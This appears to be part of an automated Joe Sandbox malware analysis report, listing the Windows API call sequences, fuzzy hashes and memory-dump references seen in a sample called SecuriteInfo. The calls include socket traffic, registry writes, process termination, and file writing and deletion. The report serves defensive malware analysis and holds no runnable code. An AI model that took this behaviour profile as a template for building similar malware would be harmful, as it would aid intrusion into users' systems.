                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 1c159393267ff6622bacc2514d092b9394eda45dcecc9c36675cb09f7ae1bce0
                                                                                                                                                                                                                                                                                            • Instruction ID: 43843e462447cfcf129c27e73463c728c6bb69ecf51c5c7ead543433eb3544f8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c159393267ff6622bacc2514d092b9394eda45dcecc9c36675cb09f7ae1bce0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39718EB1D042699AEF38CB24CC54BEAB775AB88341F5041EAE39DA6294D7B05AC48F40
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 01437580
                                                                                                                                                                                                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 014375D1
                                                                                                                                                                                                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 014376A9
                                                                                                                                                                                                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 014376D8
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 01437768
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 8a011f380b1d3a1d66dd0a40033e44721d812b046b891a66aeddece095056292
                                                                                                                                                                                                                                                                                            • Instruction ID: f973c6d2e6ffb4ed81daa0b389c36d1a9a7cc5aaf6ec5b80f634db7e472ed96b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a011f380b1d3a1d66dd0a40033e44721d812b046b891a66aeddece095056292
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 145162B4D042689BEB39CB14CC54BE9B7B5AB89311F5081DAE39DA6290C7B06EC4DF40
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01442A4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DE0), ref: 01442A7C
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DE4), ref: 01442AA2
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DE8), ref: 01442AB1
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01442B0C
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DEC), ref: 01442B40
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DF0), ref: 01442B66
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433DF4), ref: 01442B83
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3054446656-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9aaa443274d333fd06c5716741a534f2c6798fb78c35c51775e4066f0ebc5c42
                                                                                                                                                                                                                                                                                            • Instruction ID: c4c35d5d7c965c97ecce2d4a11f4f6349bab93835f4df6adf142463e6b21256d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9aaa443274d333fd06c5716741a534f2c6798fb78c35c51775e4066f0ebc5c42
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F431C4B6F00145ABD714DF65E885AEE7B76AFE8700F14C13AF505976A4CA78C940CB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(014326E0,40000000,00000000,00000000,00000003,00000000,00000000,?,01439E89), ref: 01439AF1
                                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 01439B0B
                                                                                                                                                                                                                                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 01439B20
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 01439B2A
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 01439B42
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000000FF), ref: 01439B4C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2603052737-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5b02ee9879d77f2184869c57597977fec13ff92eea1964c1e9fda94246ed1758
                                                                                                                                                                                                                                                                                            • Instruction ID: 914be022561dd8eedf72ac871333d4e89956e978601770287e55391f86139250
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b02ee9879d77f2184869c57597977fec13ff92eea1964c1e9fda94246ed1758
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ED01D775A40208BBEB24DFB4DC49F9EBB78AB48B11F508248FB11AA2D4D6B46644CB54
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01434F6B
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01434FFF
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 01435021
                                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 0143504B
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 0143505A
                                                                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0143507A
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0143508C
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01435100
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435153
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0143518F
                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0143543A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                                                                                                                                                                                                                                                                            • String ID: userC:\Windows\
                                                                                                                                                                                                                                                                                            • API String ID: 3359840872-3509716881
                                                                                                                                                                                                                                                                                            • Opcode ID: 5eaedb8444dffd5c9e6e86e360b6c9d00cba8209fda3d2ebe509eec8af40b626
                                                                                                                                                                                                                                                                                            • Instruction ID: 30691dee158a75d3e13e2c0c1206caa35ce4a74a2bec4e7f46c86eabc86cdd88
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eaedb8444dffd5c9e6e86e360b6c9d00cba8209fda3d2ebe509eec8af40b626
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 764168F5805228DBCB20DF61EC85AE9F774AB9C301F0882CBE5196A260DA735B94CF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 01437FA9: select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 014380DA
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 014381A1
                                                                                                                                                                                                                                                                                            • recv.WS2_32(00000000,00000008,00000400,00000000), ref: 014381F0
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 01438247
                                                                                                                                                                                                                                                                                            • send.WS2_32(00000000,00000000,?,00000000), ref: 0143826D
                                                                                                                                                                                                                                                                                            • closesocket.WS2_32(000000FF), ref: 01438283
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Global$AllocFreeclosesocketrecvselectsend
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 424924859-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 650d1e932c3d1809559610847685d715b042383a6f8a0e95f8717a35f4fb53df
                                                                                                                                                                                                                                                                                            • Instruction ID: 4fffd8cc68e5d70f86bf35c54f33d7fbc3da8497533d8e5d8791eb4912513c14
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 650d1e932c3d1809559610847685d715b042383a6f8a0e95f8717a35f4fb53df
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A041A07090020AEFDF64CF58CC44BEAB775BB98705F10829AF648A72A0DB749A84CF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(00000000,00000080), ref: 01439322
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 0143932F
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01433C90), ref: 0143934E
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,01432288), ref: 01439362
                                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,0143268C), ref: 01439375
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: lstrcat$DirectorySystemlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3692445580-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 01007861796dd710a6eea4adf8709b6e0785df7cdde53446f404643f5c75f6a3
                                                                                                                                                                                                                                                                                            • Instruction ID: 4a9eccac01a28dcc4a0424ff479a5efcd625894edcb40636f1c81ccebd791a63
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01007861796dd710a6eea4adf8709b6e0785df7cdde53446f404643f5c75f6a3
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D2160FAA00218ABDB30DB64DC48FAA7778BB4CB05F008199F709B3194CB705A45CF64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00001000), ref: 0143945E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000080), ref: 0143947B
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 01439495
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(0002D000), ref: 014394BF
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 014394EC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep$ExitThreadUserlstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3026710222-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0a3862a45ec07f9cf12878ef28b26af87601ac4dd9c62d56d6bc3e43d8802a44
                                                                                                                                                                                                                                                                                            • Instruction ID: 06633f39f65abf8df0450f64591aa77e3a83bf19ddf969b7dc0d461089c4b90b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a3862a45ec07f9cf12878ef28b26af87601ac4dd9c62d56d6bc3e43d8802a44
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 012195B4A443049BEB108FE4DC49BAEB7B4FB5DB55F10421AE615A63E4C7B95401CF60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 01440C6E
                                                                                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000022,00000000), ref: 01440CA0
                                                                                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,008E2BC0,0001E200,?,00000000), ref: 01440CC6
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 01440CD0
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 01440CDA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesCloseCreateHandleWritelstrlen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 96072700-0
                                                                                                                                                                                                                                                                                            • Opcode ID: f23c07ca08aba3f03904f6a78070016d51dc599abe30107282d2a93ae806cb99
                                                                                                                                                                                                                                                                                            • Instruction ID: c3c162c663bdfb21cb786e6adac9478fa9062fc9c2c9b094753d45c066d988ca
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f23c07ca08aba3f03904f6a78070016d51dc599abe30107282d2a93ae806cb99
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D115E75A00308FBEB24CFB8D889BEE7B75AB48711F108645FB06DB2D1D6309A918B54
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(00000000,?), ref: 0143A220
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 0143A236
                                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 0143A24A
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002800), ref: 0143A255
                                                                                                                                                                                                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0143A25F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AttributesDeleteExitSleepThreadUserlstrcpy
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1172011736-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 214aa5a6ab3db44c939edbd796d24f477b61a7b590f619563d7ab7172424a56e
                                                                                                                                                                                                                                                                                            • Instruction ID: 140b8bde0657de632e67623236b138753345e5e90521f7464b771c8805430a16
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 214aa5a6ab3db44c939edbd796d24f477b61a7b590f619563d7ab7172424a56e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F7F028359402145BE7208BB8D84CBA6F778BF8C700F1002A6E716C22A0DB769904CF51
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 014346EE
                                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 014346FB
                                                                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0143476E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
• Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
• Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
Similarity
• API ID: CreateProcesslstrcpylstrlen
• String ID: D
• API String ID: 2742767947-2746444292
APIs
• wsprintfA.USER32 ref: 01435AF0
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01435B2D
• RegCloseKey.KERNEL32(00000000), ref: 01435BFB
Strings
Similarity
• API ID: CloseQueryValuewsprintf
• String ID: %c%d_%d$userC:\Windows\
• API String ID: 2691868063-2326404368
APIs
• wsprintfA.USER32 ref: 01435AF0
• RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01435B2D
Strings
Similarity
• API ID: QueryValuewsprintf
• String ID: %c%d_%d$userC:\Windows\
• API String ID: 2072284396-2326404368
APIs
• htons.WS2_32(?), ref: 01438317
  • Part of subcall function 014344CB: InterlockedExchange.KERNEL32(014490C0,?), ref: 014344E9
• GetTickCount.KERNEL32 ref: 0143834E
  • Part of subcall function 01437C4E: socket.WS2_32(00000002,00000001,00000006), ref: 01437C83
• send.WS2_32(00000000,00000000,00000008,00000000), ref: 01438389
  • Part of subcall function 0143811C: GlobalAlloc.KERNEL32(00000040,-00000C00,?,?,?,?), ref: 014381A1
  • Part of subcall function 0143811C: recv.WS2_32(00000000,00000008,00000400,00000000), ref: 014381F0
  • Part of subcall function 0143811C: GlobalFree.KERNEL32(00000000), ref: 01438247
  • Part of subcall function 0143811C: closesocket.WS2_32(000000FF), ref: 01438283
• closesocket.WS2_32(000000FF), ref: 014383BE
Similarity
• API ID: Globalclosesocket$AllocCountExchangeFreeInterlockedTickhtonsrecvsendsocket
• String ID:
• API String ID: 1332007968-0
APIs
• DeleteFileA.KERNEL32(?), ref: 014345E3
• CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 014345FC
• WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0143461D
• CloseHandle.KERNEL32(?), ref: 01434627
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateDeleteHandleWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 656945655-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 313f6ee34da1165183b1406063ef831325b12263d778149e7355238c417cee94
                                                                                                                                                                                                                                                                                            • Instruction ID: 3e6a06b73978de91d64059b966b28f8d0919d1e2c32993b429f94dcd628affe6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 313f6ee34da1165183b1406063ef831325b12263d778149e7355238c417cee94
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DF0F979640308FBDB20DFA4DC4DF9EBB78AB4DB11F108644FB05AB2D4D674AA448B90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • select.WS2_32(00000000,00000000,00000000,00000000,00000000), ref: 014380DA
                                                                                                                                                                                                                                                                                            • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 014380F5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: recvselect
                                                                                                                                                                                                                                                                                            • String ID: @
